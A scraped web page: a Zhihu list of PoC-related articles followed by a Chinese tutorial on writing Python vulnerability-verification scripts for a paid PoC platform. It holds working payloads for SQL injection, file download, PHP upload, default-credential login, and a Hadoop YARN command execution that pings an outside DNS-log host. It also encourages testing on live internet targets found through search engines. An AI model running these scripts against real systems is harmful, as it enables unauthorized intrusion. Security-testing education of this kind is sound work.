命令注入漏洞分析看雪看雪,为IT专业人士、技术专家提供了一个民间交流与合作空间。本文为看雪论坛优秀文章 看雪论坛作者ID:。_879907 最近在网上看到一个关于ghostscript软件的一个poc生成脚本,看了下生成的poc感觉应该挺简单的,随手分析下,该漏洞目前在野。 一、漏洞信息 1、漏洞简述• 漏洞名称:无 • 漏洞编号:无 • 漏洞类型:命令注入 • 漏洞影响:远程命令执行 • CVSS评分:无 • 利用难度:简单 • 基础权限:不需要 2、组件概述ghostscript是一款图像浏览工具。ghostscript能够查…阅读全文​​赞同 4​​添加评论​分享​收藏Mendix POC 项目分享——系统需求说明书Mendix面向所有人的应用开发平台,帮助企业更好地推动业务发展。 项目概述 1. 项目简介本项目基于西门子 Mendix 的POC,包含私有化环境部署、Mendix 产品特性体验、基于客户IT&DT 部门的业务 POC 验证。 采用客户的私有化环境部署,使用 Mendix Studio Pro 8.5 开发工具。 其主要内容有: 基于 Mendix 的Demo 验证Mendix 扩展性验证POC 场景 1:营销系统-在线订单管理POC 场景 2:供应链系统-合同管理POC 场景 3:SUC 集成、异常零件审批工作流和数仓API 调用 2. 使用者需求目标用户:本项目目…阅读全文​​赞同 2​​添加评论​分享​收藏在软件项目或者产品中,POC(为观点提供证明)和Demo(样本,示例)的实质区别是什么?栈江湖​软件开发行业 研发经理好像百度也没有明确的答案,个人感觉POC偏重点在为自己的观点提供证明,一般在项目前期或投标阶段出现。demo偏重点在示例,例如微信官网提供了一个java、python等语言的支付的demo程序,系统或接口为了方便别人使用时提供的一个样例。 当然在项目中也会有“演示demo”这个我感觉与poc就有点相同了。阅读全文​​赞同 2​​添加评论​分享​收藏CVE-2021-24074 分享与学习看雪看雪,为IT专业人士、技术专家提供了一个民间交流与合作空间。CVE-2021-24074 分享与学习 本文为看雪论坛优秀文章 看雪论坛作者ID:50u1w4y 0x00 前言 这篇文章主要是想分享一下CVE-2021-24074的漏洞细节,并根据博客作者的方案写了一个连poc都算不上的测试代码。所以如果你只是想找份能用的poc 的话,那么这篇文章是没法满足你的需求的。 而如果你正打算分析该漏洞的话,这篇文章应该能对你有一点小帮助吧,或许对你理解 CVE-2021-24086 的细节也能有所帮助。(我没有去看这个IPv6 的洞,但…阅读全文​​赞同 1​​添加评论​分享​收藏什么是POC?验证性测试用途是什么?DIA数皆智能​已认证账号POC是指业界流行的针对客户具体应用的验证性测试 名词:验证性测试 英文全称:POC(Proof of Concept) 中文名称:验证性测试 名词解释: 验证性测试(Proof of Concept,简称POC)是业界流行的针对客户具体应用的测试方法。它的主要目的是验证客户提出的性能要求和扩展需求是否能够得到满足。 在POC过程中,测试人员会根据用户的需求,在选定的服务器上进行真实数据的运行,通过实际测算来评估系统的承载能力和性能变化。 在进…阅读全文​​赞同 1​​添加评论​分享​收藏[论文总结]a-22-s&p-GREBE: Unveiling Exploitation Potential for Linux Kernel BugsAniston0x00 Big Question0x01 论文研究的问题是什么,为什么要研究这个问题?这篇论文研究的问题是 Linux 内核漏洞的多种触发漏洞行为的探索和利用潜力评估。之所以要研究这个问题,是因为在 Linux 内核中存在许多漏洞,但 传统的模糊测试方法只能发现一个错误行为,无法全面评估漏洞的利用潜力。因此,他们提出了一种新的内核模糊测试技术 GREBE,旨在探索一个内核漏洞的所有可能错误行为,并提高漏洞的利用潜力评估。这项研究的目的…阅读全文​​赞同 1​​添加评论​分享​收藏POC 推出 Elicit Ti 3D打印钛制骑行眼镜,环保与科技的结合许方雷 Leo​北京斯克莱特科技有限公司 总经理来自瑞典的防护设备制造商POC推出了一款名为Elicit Ti 的钛制自行车太阳镜,以提供具有高性能竞争水平的运动自行车,同时也在自行车制作过程中考虑到了资源的可持续性问题。作为一家为雪上运动和自行车运动提供高性能保护设备的制造商,POC 是所开发的 Elicit Ti 自行车太阳镜是结合瑞典金属增材制造专家 AIM Sweden 及其 EBM 技术完成制作的。 [图片] 增材制造技术凭借其高精度和较好的成形质量而得到使用和信赖,这对于自行车行业来说…阅读全文​​赞同 1​​添加评论​分享​收藏浏览量27.2 万讨论量124  帮助中心知乎隐私保护指引申请开通机构号联系我们 举报中心涉未成年举报网络谣言举报涉企虚假举报更多 关于知乎下载知乎知乎招聘知乎指南知乎协议更多京 ICP 证 110745 号 · 京 ICP 备 13052560 号 - 1 · 京公网安备 11010802020088 号 · 京网文[2022]2674-081 号 · 药品医疗器械网络信息服务备案(京)网药械信息备字(2022)第00334号 · 广播电视节目制作经营许可证:(京)字第06591号 · 服务热线:400-919-0001 · Investor Relations · © 2024 知乎 北京智者天下科技有限公司版权所有 · 违法和不良信息举报:010-82716601 · 举报邮箱:jubao@zhihu.

白嫖大法 | 编写POC之腰缠万贯-腾讯云开发者社区-腾讯云

| 编写POC之腰缠万贯-腾讯云开发者社区-腾讯云Khan安全团队白嫖大法 | 编写POC之腰缠万贯关注作者腾讯云开发者社区文档建议反馈控制台首页学习活动专区工具TVP最新优惠活动文章/答案/技术大牛搜索搜索关闭发布登录/注册首页学习活动专区工具TVP最新优惠活动返回腾讯云官网Khan安全团队首页学习活动专区工具TVP最新优惠活动返回腾讯云官网社区首页 >专栏 >白嫖大法 | 编写POC之腰缠万贯白嫖大法 | 编写POC之腰缠万贯Khan安全团队关注发布于 2020-12-11 11:50:104.3K0发布于 2020-12-11 11:50:10举报文章被收录于专栏:Khan安全团队Khan安全团队一、前言:POC&EXP什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。poc和exp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可以使漏洞测试大大加快速度,可以在漏洞发现时批量检测资产漏洞情况。什么是通用型应用漏洞?有一定使用量或者说是用户量的第三方框架、软件、应用、系统等对应的漏洞,拿web层应用来说需要满足:1、 两个站点以上使用了该应用,可参考cnvd(国家信息安全漏洞共享平台)的漏洞;2、 路径固定、参数固定。为什么要编写POC?如果仅是停留在使用别人的渗透工具上来说,对个人自身进步来说,单纯的涨了姿势,久了可能还会忘记。编写POC不仅可以提高对漏洞原理的理解,一定程度上提高了编程开发能力,还可以规范自己的武器库,在做渗透测试项目的时候更加得心应手。为什么要做好POC的质量和数量?一个安全检测工具或者说是一个安全检测产品最重要的是POC插件,为其赋能的POC插件质量和数量决定了它的检测能力。为什么需要漏洞、POC平台?为网络安全出一份力和众人拾柴火焰高的道理:用户社区的力量。PoC++平台是数字观星科技有限公司自主开发并运营的POC收录平台,旨在通过凝聚全社会的安全技术力量,打造覆盖面更广、检测能力更强的一流漏洞扫描、验证平台。提交POC到我们的POC++平台可以获取丰厚的奖励,积分兑换京东卡等。二、关于POC编写流程通常编写POC流程:1、漏洞发现或者说是找漏洞2、寻找线上目标或搭建漏洞环境复现3、理解漏洞的触发点、判断是否存在漏洞4、编写POC5、POC测试,通用漏洞,找到足够的url证明这是个通用可用的POC如果写POC是为了提交到观星的POC++平台,建议先查重,当有人已经提交相关的POC,可以使用星豆(平台积分)去兑换,省下的时间可以写其他的POC。三、WEB常见漏洞POC类型介绍1、敏感信息泄露配置信息泄露、日志泄露、路径泄露等。你觉得它是漏洞,可能会漏洞触发关联到危害,那就是漏洞。2、未授权访问按照理解,应该设认证的功能没设置认证。需要安全配置或权限认证的功能、页面存在缺陷导致可以直接访问,从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。3、默认密码顾名思义,常见的路由器、摄像头等设备或应用的默认密码,以账号密码admin/admin为经典。4、SQL注入SQL注入是比较常见的网络攻击方式之一,sql语句注入,可以说是研究得最多最深的漏洞。攻击者提交的恶意数据可以被数据库解析执行,常见数据库有mysql、mssql、oracle、access、postgresql、sqlite等,各有差异。按照回显效果分:有回显:联合注入和报错注入。无回显:时间盲注、布尔盲注。联合注入:利用显示位,注入爆出想要的数据。报错注入:报错注入是利用数据库在出错的时候会引出查询信息。时间盲注:注入不同的延时语句,再通过页面响应时间判断是否存在注入。布尔盲注:注入使数据库得到true和false的场景,比如判断某个数据表是否存在sql注入的两个payload,页面的响应不同判断注入存在。5、XSSXSS(Cross Site Scripting,跨站脚本攻击)分三种类型:1)反射型:攻击者准备攻击链接, 需要受害者访问链接触发XSS代码,一般容易出现在搜索页面。2)存储型:XSS代码存在服务器中的,如在发表文章的时候插入payload,如果没有过滤或过滤不严payload存储在服务器中,当有用户访问插入payload的文章链接之后触发XSS代码执行。3)Dom型:基于Dom(DocumentObjeet Model基于文档对象模型)的漏洞,DOM中有很多对象,其中一些是用户可以操纵的,如location等。客户端的脚本不依赖于提交数据到服务器端,如果没有将DOM中传入的数据做严格的过滤,将其限制在可控范围内,就会产生DOM XSS。6、目录穿越、文件下载、文件包含目录穿越:目录穿越是未设置访问边界,用户可以越界访问到不该提供文件,会造成任意文件读取漏洞。文件下载:网站提供了文件(附件)下载功能,如果对下载的文件没有做限制,恶意利用这种方式下载服务器的敏感文件,如config.prorertie敏感文件等。文件包含:为了使用代码的重用性,通过文件包含函数将代码文件包含进来,从而使用里面的代码,文件包含在php开发中很常见。当文件包含函数的文件参数可控时,文件参数又未进行校验或者校验被绕过,就会产生文件包含漏洞,导致读取文件、代码执行等。7、文件上传web项目通常提供了文件上传的功能,当上传功能没有限制校验或者限制被绕过时,攻击者上传了恶意脚本且恶意脚本被web服务器解析成脚本文件执行脚本内容,就会导致代码执行。8.远程代码、命令执行远程代码执行:拿功能可能出现的漏洞来说。当有了方便传输、提高性能等需求,web项目中就可能会用到序列化。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,反序列化为相反过程。当不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能导致任意代码执行。为了方便开发,项目使用的一些组件可能会支持一些表达式,当安全策略被绕过时,攻击者就可以通过构造特定数据带入表达式造成远程代码执行。功能强大的背后可能出现的漏洞就越多,需要做的安全措施就越多。远程命令执行:常见的web应用调用服务器程序,当参数被直接带入程序执行命令或过滤被绕过时,就可能会出现命令注入漏洞,导致远程命令执行。如支持ping功能的web程序参数IP,使用管道符|进行拼接恶意命令,就可能导致远程命令执行。9.URL跳转比如一些场景为登录之后跳转到个人中心,跳转的url可控或者过滤被绕过,就会导致任意URL链接跳转。以上仅列举常见漏洞,POC++平台接收包含但不限于以上漏洞的POC。四、常见漏洞POC类型编写按照如上漏洞类型,通过案例了解漏洞,并使用python编写poc。所以该章节学习前提:可以看懂python基础语法,看不懂的童鞋建议学习一下python基础语法,进一步有进一步的快乐呀。python2和python3如何选择?基础语法,学习哪个版本不重要,都行。个人推荐菜鸟教程的python教程,链接:https://www.runoob.com/python/python-tutorial.html。1、敏感信息泄露漏洞案例:在2019年出现的Coremail邮件系统配置文件信息泄露漏洞,Coremail mailsms接口配置存在未授权访问导致敏感信息泄露。漏洞的配置文件泄露地址是/mailsms/s?func=ADMIN:appState&dumpConfig=/。我们可以打开一个存在漏洞的链接:我们可以发现漏洞确实存在,/mailsms/s?func=ADMIN:appState&dumpConfig=/页面存在coremail关键字作为应用指纹,配置信息也直接显示泄露了,现在我们可以开始编写这个漏洞的POC了。关于指纹信息学习编写可以查看以往文章介绍,欢迎将指纹信息提交至我们平台获取丰厚奖励,链接:https://fp.shuziguanxing.com/。写POC之前我们先确认这是个通用漏洞,且POC的原则是以最少请求、最准确确认当前应用存在漏洞(少请求、低误报漏报)。所以我们的POC可以用python2编写为:2、未授权访问漏洞案例:互联网上存在很多暴露在公网上的摄像头等安防设备,且未设置认证,导致可以实时查看监控等操作。作为安防设备不安全,本身就是一种讽刺笑话。这里我们使用空间搜索引擎搜索找一款派尔高 Sarix网络摄像头。访问/liveview即可查看摄像头实时监控,且查看源码Copyright内容部分可以作为指纹信息。所以判断是否存在漏洞可以写成:请求状态码200&Copyright © 2007-2010, PELCO· Pelco.com。但是在测试POC的时候发现有些跳转到登录界面也会满足这个条件,页面里面有执行js页面跳转代码window.location.replace("/auth/login",所以还要加跳转代码未在页面里。POC可以写为:# coding:utf-8

import re

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

action = "/liveview"

target = target.rstrip("/")

verfy_url = target + action#有时候路由URL会出现//liveview访问不到资源404,所以要确保访问到http://xxxx/liveview

pattern = re.compile('Copyright.+PELCO.+

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("http://111.111.111.111/")复制3、默认密码漏洞案例:这里我们找Grafana可视化工具后台管理默认账号密码,实际测试grafana默认用户名密码为经典的admin/admin。找一个实例测试,登录之后,点击"Skip"就可以进入后台。浏览器f12查看请求包发现是将账号密码的payload{"user":"admin","password":"admin"}通过post方式到URL:/login,成功之后会返回{"message":"Loggedin","redirectUrl":"/"},而且会设置cookie,也就是响应头的Set-Cookie,经过观察Set-Cookie里的必要字段为grafana_session或者为grafana_sess,这个可以作为应用指纹,也可以作为登录成功的判断。所以我们的POC可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

"Accept": "application/json, text/javascript, */*; q=0.01",

"Content-Type": "application/json"

}

action = "/login"

payload = '{"user":"admin","password":"admin"}'

target = target.rstrip("/")

verfy_url = target + action

resp = req.post(verfy_url, data=payload, headers=headers, timeout=30, verify=False, allow_redirects=False)

if (resp.status_code == 200 and "grafana_session" in resp.headers["Set-Cookie"]) or (

resp.status_code == 200 and "grafana_sess" in resp.headers["Set-Cookie"]):

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("http://111.111.111.111/")复制‍4、SQL注入漏洞案例:这里我们通过注入sql语句效果有没有直接回显数据和不回显数据案例编写poc。(1)回显:有显示位的时候可以使用联合注入注出数据,如果报错信息功能未关可以使用报错注入注出数据。以Strassen24Panomizer Objects.php参数TypeCategoryId存在SQL注入为示例。漏洞详情链接:https://cxsecurity.com/issue/WLB-2020030142直接使用漏洞详情提供的测试url测试。漏洞链接为/php/Objects.php?Action=ChangeCategory&TypeCategoryId=1,这里通过updatexml函数报错注入注出数据,执行一个md5加密就好,payload:/php/Objects.php?Action=ChangeCategory&TypeCategoryId=1%20and%20updatexml(1,md5(996),1)%20--+:响应没有特定指纹,一次请求,响应足够特殊所以不再请求匹配指纹。执行md5加密数据时,可以加上随机字符串加密,然后再判断md5是否在响应内容,这个可以自己加。所以我们的poc可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

payload="/php/Objects.php?Action=ChangeCategory&TypeCategoryId=1%20and%20updatexml(1,md5({}),1)%20--+".format(996)

resp1 = req.get(target+payload, headers=headers, timeout=30, verify=False, allow_redirects=False)

if "b8aff0438617c055eb55f0ba5d226fa" in resp1.text and resp1.status_code == 200:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("https://111.111.111.111")复制(2)不回显:注意:延时注入要产品特征匹配降低误报率SQL注入有时候没有直接回显数据,但是可以注入,在编写poc可以使用延时判断是否存在sql注入漏洞,以风讯(foosun)CMS.net版本/user/City_ajax.aspx 文件Cityid 参数SQL注入漏洞为示例。经测试该注入点支持堆叠注入,所以延时5秒的payload为/user/City_ajax.aspx?Cityid=1'WAITFOR DELAY '0:0:5'-- q,直接在互联网上找到一个实例测试:响应内容没有明显的指纹信息,在首页有明显的指纹For Foosun Inc,所以再请求首页匹配指纹。在poc中判断是否存在注入可以通过两个payload的时间差判断:大于等于4.5秒。所以我们的POC可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

resp1 = req.get(target, headers=headers, timeout=30, verify=False, allow_redirects=False)

if "For Foosun Inc" in resp1.text and resp1.status_code == 200:

payload1 = "/user/City_ajax.aspx?Cityid=1%27%20WAITFOR%20DELAY%20%270:0:0%27--%20q"

payload2 = "/user/City_ajax.aspx?Cityid=1%27%20WAITFOR%20DELAY%20%270:0:5%27--%20q"

resp2 = req.get(url=target + payload1, headers=headers, verify=False, timeout=30)

stime1 = resp2.elapsed.total_seconds()

resp3 = req.get(url=target + payload2, headers=headers, verify=False, timeout=30)

stime2 = resp3.elapsed.total_seconds()

if resp1.status_code == resp2.status_code == 200 and stime2 - stime1 >= 4.5:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("http://111.111.111.111/") 复制5、文件读取、文件下载、遍历、文件包含漏洞案例:漏洞上验证都差不多,取系统的必要文件做证明即可。应用的系统可能大部分为windows或者linux,所以编写POC的时候要考虑这两个系统,其他系统可以自行考虑是否加入。windows可以取c:/windows/system.ini,linux可以取/etc/passwd,其他的低权限可读的系统必要文件也可以。以EVO-CRM Script v1.02任意文件下载漏洞为例,详情漏洞链接:https://cxsecurity.com/issue/WLB-2020030066,使用漏洞详情里的漏洞url测试:漏洞url为/download.php?nome_file=,nomefile参数为下载文件参数,`include/applicationtop.php的存在EVO-CRM的指纹,所以可以直接下载这个文件作为证明。这里下载也可以下载系统文件,但是可能要多请求一次匹配指纹,这里优先下载存在指纹信息的文件include/application_top.php`,所以poc可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

action = "/download.php?nome_file=include/application_top.php"

verfy_url = target + action

resp = req.get(verfy_url, headers=headers, timeout=30, verify=False, allow_redirects=False)

if resp.status_code == 200 and 'EVO-CRM - Content Relationship Management' in resp.text and "mysql_evocms_fetch_object" in resp.text:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("https://111.111.111.111/")复制6、文件上传漏洞案例:以Monitorr 1.7.6 存在文件上传漏洞为示例,漏洞详情https://www.exploit-db.com/exploits/48980。漏洞详情中可以看到/assets/php/upload.php未授权且过滤被绕过,可直接上传php文件执行php代码。前几天有个小伙伴已经写好交到我们的POC平台,所以POC可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

filename = '123123123123.php'

code = "GIF89a213213123456"

files = {'fileToUpload': (filename, code, 'Content-Type: image/gif')}

action1="/assets/php/upload.php"

resp1 = req.post(target+action1,headers=headers, verify=False, timeout=30, allow_redirects=False,files=files)

if resp1.status_code == 200 and filename in resp1.text and 'has been uploaded' in resp1.text:

action2="/assets/data/usrimg/{}".format(filename)

resp2 = req.get(target+action2, verify=False)

if resp2.status_code == 200 and "0b8aff0438617c055eb55f0ba5d226fa" in resp2.text:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("http://111.111.111.111/") 复制7、代码、命令执行漏洞案例:以Hadoop YARN ResourceManager 未授权访问导致远程命令执行漏洞作为漏洞演示,漏洞原理链接:http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf。漏洞复现以及exp脚本可查看:https://vulhub.org/#/environments/hadoop/unauthorized-yarn/,这里我们直接引用里面的exp,修改执行命令,因为无回显,所以通过dnslogapi返回结果判断是否存在漏洞,dnslog api可以填写自己的。所以poc可以为:# coding:utf-8

import random

import time

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

target=target.rstrip("/")

action1 = "/ws/v1/cluster/apps/new-application"

resp1 = req.post(target + action1, headers=headers, timeout=30, verify=False, allow_redirects=False)

app_id=0

try:

app_id = resp1.json()['application-id']

except Exception as e:

print e

return False

action2="/ws/v1/cluster/apps"

ceye_domain="{}.xxxxx.ceye.io".format(''.join(random.sample('abcdefghijklmnopqrstuvwxyz',5)))

ceye_api_token = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"

data = {

'application-id': app_id,

'application-name': 'test',

'am-container-spec': {

'commands': {

'command': 'ping -c 1 %s' % ceye_domain

},

},

'application-type': 'YARN',

}

req.post(target+action2, json=data, headers=headers, timeout=30, verify=False, allow_redirects=False)

time.sleep(3)

ret=req.get("http://api.ceye.io/v1/records?token={}&type=dns&filter={}".format(ceye_api_token,ceye_domain)).json()["data"]

if ret:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("http://111.111.111.111/")复制8、URL跳转漏洞案例:url跳转拿SMF4Mobile 1.1.5 存在URL重定向漏洞作为漏洞演示,漏洞详情链接:https://cxsecurity.com/issue/WLB-2019030006。在漏洞详情里面可以看到可测试的url,漏洞链接为index.php?thememode=mobile;redirect=,redirect为要跳转的url参数,响应状态码为301或者302。在编写url重定向漏洞POC的时候,poc请求里面不让其跳转,一次请求检查响应头的跳转或前端跳转代码即可。这个漏洞的url足够特殊,所以不需要再进行一次请求得到指纹匹配,所以POC可以为:# coding:utf-8

import requests as req

def verify(target):

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

action = "/index.php?thememode=mobile;redirect=https://cxsecurity.com/"

verfy_url = target + action

resp = req.get(verfy_url, headers=headers, timeout=30, verify=False, allow_redirects=False)

if resp.status_code in [301,302] and 'https://cxsecurity.com/' in resp.headers["Location"]:

print target + ",存在漏洞"

return True

return False

if __name__ == '__main__':

verify("https://111.111.111.111/")复制五、POC规范、POC框架将poc的格式等规范好放入一个框架内方便查看、使用,好处多多。POC框架有很多,常见开发语言是python、golang、ruby等,常见的POC框架有pocsuite、osprey、poc-t、kunpeng等。这里使用python2版本的pocsuite编写POC。1、pocsuite介绍Pocsuite 是知道创宇安全研究团队打造的一款基于漏洞与 PoC 的漏洞验证框架。在获取到相关漏洞详情后,任何有一定 Python 开发基础的人都可以基于 Pocsuite 开发出对应漏洞的 PoC 或者 Exp ,轻而易举的就可以直接使用 Pocsuite 进行相关的验证和调用,而无需考虑底层代码架构等。2、安装以及简单使用可通过pip install pocsuite安装,也可以直接git clone https://github.com/knownsec/Pocsuite下载使用。简单常用命令:python pocsuite.py -r tests/poc_example.py -uhttp://www.example.com/ --verify-r 为poc路径,可以单个poc文件,也可以是poc文件夹,-u为验证url,--verify为执行poc验证函数如有第三方模块可将对应的包放入pocsuite的thirdparty文件夹。更多详细的用法:https://github.com/knownsec/Pocsuite/blob/dev/docs/USAGE.md3、POC编写步骤本地poc文件命名规范请查看:https://github.com/knownsec/Pocsuite/blob/dev/docs/CODING.md#namedstandard1)基础信息填写:vulID = '1571' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0

version = '1' #默认为1

author = 'zhengdt' # PoC作者的大名

vulDate = '2014-10-16' #漏洞公开的时间,不知道就写今天

createDate = '2014-10-16'# 编写 PoC 的日期

updateDate = '2014-10-16'# PoC 更新的时间,默认和编写时间一样

references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']# 漏洞地址来源,0day不用写

name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 PoC'# PoC 名称

appPowerLink = 'https://www.drupal.org/'# 漏洞厂商主页地址

appName = 'Drupal'# 漏洞应用名称

appVersion = '7.x'# 漏洞影响版本

vulType = 'SQL Injection'#漏洞类型,类型参考见 漏洞类型规范表

desc = '''

Drupal 在处理 IN 语句时,展开数组时 key 带入 SQL 语句导致 SQL 注入,

可以添加管理员、造成信息泄露。

''' # 漏洞简要描述

samples = []# 测试样列,就是用 PoC 测试成功的网站

install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写复制年轻人要讲"码徳",写清楚必要信息方便你我他,具体要求请看如下图片代码注释:(有些字段是在如上基础信息添加的,越详细越好哈)还是要唠嗑一下,ID编号可加上vulID、cveID、cnvdID、cnnvdID变量字段,详细一点好,也可为空;author为你的大名ID都行;version为poc的版本,默认为1;日期变量字段有vulDate、createDate、updateDate,分别代表漏洞发现日期、poc编写日期、poc编写更改日期;name为当前poc名称;desc为poc的漏洞描述;solution为漏洞poc解决方案;severity为poc漏洞危害等级,高中低危害:high、medium、low;vulType为漏洞类型,如sql注入为SQL Injection,也可以缩写的sql-inj;taskType为任务类型,比如统称的应用漏洞可以填写为app-vul;references为参考引用,比可填上参考链接,没有则留空;appName为影响漏洞应用名称;appVersion为影响漏洞应用版本;appPowerLink为应用产品链接,可为空;samples为简单的线上、互联网上的测试案例网站或者说目标。

详细具体规范请查看:https://github.com/knownsec/Pocsuite/blob/dev/docs/CODING.md提交POC++平台可参照平台帮助中心:https://poc.shuziguanxing.com/#/news#19-500000/19-500000/2-5000002)编写模块与结果返回:一个干净的py插件模板,按照如下模板填入基础信息,之后编写验证和攻击模块即可:#!/usr/bin/env python

# coding: utf-8

from pocsuite.api.request import req

from pocsuite.api.poc import register

from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):

vulID = ''

cveID = ''

version = ''

author = ['']

vulDate = ''

createDate = '2019-03-25'

updateDate = '2019-03-25'

references = ['']

name = ''

appPowerLink = ''

appName = ''

appVersion = ''

vulType = ''

desc = '''

'''

samples = ['']

install_requires = ['']

#请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

def _attack(self):

result = {}

#Write your code here

return self.parse_output(result)

def _verify(self):

result = {}

#Write your code here

return self.parse_output(result)

def parse_output(self, result):

#parse output

output = Output(self)

if result:

output.success(result)

else:

output.fail('Internet nothing returned')

return output

register(TestPOC)复制4、以上常见漏洞POC类型编写测试用Coremail邮件系统配置文件信息泄露漏洞做为编写POC练习,示例代码,之后就可以按照文档微调即可。先填写基础信息,最后编写模块,结果返回输出函数copy即可,所以poc为:#!/usr/bin/env python

# coding: utf-8

from pocsuite.api.request import req

from pocsuite.api.poc import register

from pocsuite.api.poc import Output, POCBase

import sys

reload(sys)

sys.setdefaultencoding('utf8')

class TestPOC(POCBase):

vulID = '0'

version = '1'

author = 'guanxing'

vulDate = '2019-06-14'

createDate = '2020-11-30'

updateDate = '2020-11-30'

references = ['https://www.secpulse.com/archives/107611.html']

name = 'Coremail邮件系统配置文件信息泄露漏洞 POC'

appPowerLink = 'https://www.coremail.cn/'

appName = 'Coremail邮件系统'

appVersion = '*'

vulType = 'Information Disclosure'

desc = '''

Coremail mailsms接口配置存在未授权访问漏洞,可能导致敏感信息泄露。Coremail配置文件未授权访问的地址:/mailsms/s?func=ADMIN:appState&dumpConfig=/

'''

samples = ["http://111.111.111.111","http://222.222.222.222"]

def _attack(self):

result = {}

# Write your code here

return self.parse_output(result)

def _verify(self, verify=True):

result = {}

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",

}

payload = "/mailsms/s?func=ADMIN:appState&dumpConfig=/"

verify_url = self.url + payload

resp = req.get(verify_url, headers=headers, timeout=30, verify=False, allow_redirects=False)

if resp.status_code == 200 and 'coremail' in resp.text and '' in resp.text:

result['VerifyInfo'] = {}

result['VerifyInfo']['URL'] = self.url

result['VerifyInfo']['Payload'] = payload

return self.parse_output(result)

def parse_output(self, result):

# parse output

output = Output(self)

if result:

output.success(result)

else:

output.fail('Internet nothing returned')

return output

register(TestPOC)复制常见基础POC可以按照如上的模板进行微调改写,欢迎将POC提交至我们的POC平台获取奖励。六、如何提交POC到数字观星POC平台先上链接:https://poc.shuziguanxing.com/。没有注册的小伙伴可以注册一下,奖励多多。可以先查看帮助中心,里面有详细的提交步骤等文档。可以加入我们的POC、指纹刷分群,有小哥哥24小时在线为你解答:如果加不上,可添加如下小哥哥微信方便入群:我们的兑换礼品商城,暂时有如下商品,欢迎入群唠嗑:七、如何刷POC赚奖励赚钱什么?poc还能刷?是的,和刷漏洞一样,很多安全公司都收POC,比如数字观星。1、找漏洞之常用漏洞公开平台:对于白帽子而言,PoC/Exp资源库就是我们的军火库,军火不行怎么上战场?推荐漏洞公开平台:(1)微信公众号、博客文章推荐一个平台:http://wechat.doonsec.com/wechat_github/里面收集了很多的安全公众号,每天也可以查看文章,有时候公众号复现之后还会提供测试目标的dork语法方便查找目标和docker靶机。(2)github现在大部分的白帽子都喜欢在github公开漏洞利用,搜索一下可能有惊喜。链接:https://github.com/。这里提供一个思路,采集大量的cve编号和利用相关关键字搜索或者监控每天更新的cve编号+相关关键字搜索poc,这样可以刷大量poc。注意:需要注意的是可能会出现”假货“,看到exp/poc等可执行的脚本,有能力的先看看代码别着急运行,看不懂可以丢虚拟机运行,不然下一秒就是”有主机请求上线!“(3)exp-db面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况。链接:http://www.exploit-db.com/(4)shodanshodan:一款国外的网络空间搜索引擎,它也会收集一些exp,链接:https://exploits.shodan.io/?q=*(5)packetstorm很多exp的老牌安全网站,链接:https://packetstormsecurity.com/files/tags/exploit/(6)0day.today链接:https://0day.today/(打不开请自行解决)(7)cxsecurity.com里面会公开一些漏洞,漏洞详情里面有时候会有直接测试的漏洞链接,链接:https://cxsecurity.com/(8)seebug知道创宇的漏洞平台链接:https://www.seebug.org/(9)其他• http://www.openwall.com/lists/oss-security/• https://www.vulnerability-lab.com/• https://www.exploit-database.net/• http://www.expku.com/• 推特• 论坛• 0组(可惜是要登录的)• 白泽文库• 博客• 